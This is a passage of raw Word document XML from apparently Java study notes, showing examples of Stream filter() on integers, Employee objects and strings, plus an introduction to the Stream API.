    <w:p w14:paraId="659F0714" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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original stream remains </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unmodified</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DF757E" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> include the elements for which the predicate returns false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AB137A"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1: Basic usage of filter() to filter elements based on a condition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39170BB5"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Let's say we have a list of integers, and we want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> out all the even numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4428F72B"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s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729F1358"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB6184B"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stream.Collectors;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CEE2DD" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E22E85"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FilterExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1F966F"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48DAEC4D"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Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5, 6, 7, 8, 9);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A826DC" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AE77413"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se filter to keep only even numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5CF8E9"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Integer&gt; evenNumbers = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C5CDCC"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lter(n -&gt; n % 2 == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0074EC12"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209123AA" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B120247"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evenNumbers);  // Output: [2, 4, 6, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEE5B1B"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F2A2666"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F10002D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E3B87B" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99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e use the filter() function to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>keep only even numbers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by passing a lambda expression n -&gt; n % 2 == 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62292385"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2: Using filter() with objects to select based on a property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F44812D"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ssume we have a list of Employee objects, and we want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>filter employees with age greater than 30</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621C8FB6"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s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC21653"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDF6CDB"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stream.Collectors;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625FED64" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1522FB62"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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A12A136"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BF80D1"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age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD907E" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5CFEF3"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mployee(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AD8D91"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021CACA0"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21172B67"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0E8C785" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D3AED2B"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int getAge() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A958C5"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age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BF68B7"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1210495" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB98247"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ring getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C78F79"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D7D8D8"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EA69FAD"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9487516" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BC07A2D"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FilterExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721BD820"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313F4447"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Employee&gt; employees = Arrays.asList(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632B2CFC"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new Employee("John", 25),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69AD8C"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new Employee("Alice", 35),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133379DA"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new Employee("Bob", 40)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D65732"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1DBD915" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A23ABC8"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se filter to keep employees whose age is greater than 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0581F77E"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Employee&gt; filteredEmployees = employees.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66005C76"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lter(e -&gt; e.getAge() &gt; 30)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E803D8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE83B4C" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5137DDE6"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lteredEmployees.forEach(e -&gt; System.out.println(e.getName()));  // Output: Alice, Bob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6748B42B"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B34B9DF"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0CBA190"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F01ED65" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99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e used filter() to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>select employees</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> whose age is greater than 30.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FD44F7"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3: Chaining filter() with other stream operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4B6238"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can chain filter() with other stream operations like map() or collect(). For example, you can first </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> out some elements and then </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> them to another value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5903B172"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s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBB379B"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1251234E"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stream.Collectors;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC433B0" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AFFC44B"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FilterExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411A7DE3"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305C450F"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String&gt; words = Arrays.asList("apple", "banana", "cherry", "date");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED210E3" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDEB666"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se filter and map to filter long words and convert them to uppercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A082A0A"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String&gt; longWordsUpperCase = words.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5641AA4E"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lter(w -&gt; w.length() &gt; 5) // filter words with length greater than 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302F6906"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String::toUpperCase)    // convert them to uppercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DCDA3B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ACD51D" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15787E8C"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longWordsUpperCase);  // Output: [BANANA, CHERRY]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9B7F80"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A7725A5"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7EC041B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14665F7F" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99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e first </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> words longer than 5 characters and then </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> them to uppercase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366A3CE4"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24AEC1AF" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99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filter()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> function in Java Streams is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements from a stream that satisfy a given condition (predicate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F491BA8" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99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returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing only the elements that match the condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B6E802" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99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original stream remains unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEF3E64" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99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is commonly used in scenarios where you want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>remove unwanted elements</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select elements based on a specific condition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E770829" w14:textId="3C072F10" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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8464D0F">
          <v:rect id="_x0000_i1689" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D9AA0A" w14:textId="77777777" w:rsidR="00A36E93" w:rsidRPr="00CE4B95" w:rsidRDefault="00A36E93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="222" w:name="_Toc196307702"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Stream API?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="222"/>
    </w:p>
    <w:p w14:paraId="32FED1C1" w14:textId="1D968FFD" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">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Stream API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java, introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, is a new abstraction that allows you to work with sequences of elements (such as collections, arrays, or I/O channels) in a functional style. The Stream API is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package and provides a powerful way to process data in a declarative manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C19581"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Features of Stream API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41915F23" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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unctional Programming Style:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FBA380" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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tream API allows you to express operations on data in a functional style, making it more concise and readable.</w:t>
      </w:r>
    </w:p>
